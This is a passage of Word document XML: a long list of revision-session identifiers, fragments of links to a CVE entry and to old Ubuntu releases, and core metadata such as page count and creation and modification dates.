    <w:rsid w:val="00FD41B0"/>
    <w:rsid w:val="00FD48EF"/>
    <w:rsid w:val="00FD49BE"/>
    <w:rsid w:val="00FD49E7"/>
    <w:rsid w:val="00FD4C49"/>
    <w:rsid w:val="00FD4C51"/>
    <w:rsid w:val="00FD55C0"/>
    <w:rsid w:val="00FD6950"/>
    <w:rsid w:val="00FD6F99"/>
    <w:rsid w:val="00FD75D0"/>
    <w:rsid w:val="00FD77B4"/>
    <w:rsid w:val="00FD7BB5"/>
    <w:rsid w:val="00FD7C7D"/>
    <w:rsid w:val="00FD7F89"/>
    <w:rsid w:val="00FE062A"/>
    <w:rsid w:val="00FE06CF"/>
    <w:rsid w:val="00FE073D"/>
    <w:rsid w:val="00FE0C24"/>
    <w:rsid w:val="00FE10B1"/>
    <w:rsid w:val="00FE13C3"/>
    <w:rsid w:val="00FE299C"/>
    <w:rsid w:val="00FE30C8"/>
    <w:rsid w:val="00FE3341"/>
    <w:rsid w:val="00FE383B"/>
    <w:rsid w:val="00FE3BC5"/>
    <w:rsid w:val="00FE40E1"/>
    <w:rsid w:val="00FE41BD"/>
    <w:rsid w:val="00FE4741"/>
    <w:rsid w:val="00FE4905"/>
    <w:rsid w:val="00FE5157"/>
    <w:rsid w:val="00FE5C94"/>
    <w:rsid w:val="00FE5CAF"/>
    <w:rsid w:val="00FE5E4D"/>
    <w:rsid w:val="00FE5F5D"/>
    <w:rsid w:val="00FE69C3"/>
    <w:rsid w:val="00FE6AB0"/>
    <w:rsid w:val="00FE6BB4"/>
    <w:rsid w:val="00FE7AB5"/>
    <w:rsid w:val="00FE7CA8"/>
    <w:rsid w:val="00FE7CAA"/>
    <w:rsid w:val="00FF060E"/>
    <w:rsid w:val="00FF19A6"/>
    <w:rsid w:val="00FF1CE0"/>
    <w:rsid w:val="00FF1D23"/>
    <w:rsid w:val="00FF21B0"/>
    <w:rsid w:val="00FF256A"/>
    <w:rsid w:val="00FF2650"/>
    <w:rsid w:val="00FF2839"/>
    <w:rsid w:val="00FF2C4E"/>
    <w:rsid w:val="00FF2F11"/>
    <w:rsid w:val="00FF3006"/>
    <w:rsid w:val="00FF430F"/>
    <w:rsid w:val="00FF475F"/>
    <w:rsid w:val="00FF4DEE"/>
    <w:rsid w:val="00FF50A5"/>
    <w:rsid w:val="00FF50A7"/>
    <w:rsid w:val="00FF5421"/>
    <w:rsid w:val="00FF5888"/>
    <w:rsid w:val="00FF6601"/>
    <w:rsid w:val="00FF6A0D"/>
    <w:rsid w:val="00FF6A38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9B60FE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cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-88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old-releases.ubuntu.com/releases/21.04/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3</TotalTime>
  <Pages>18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7170</cp:revision>
  <cp:lastPrinted>2022-02-19T00:46:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-31T16:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-16T22:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>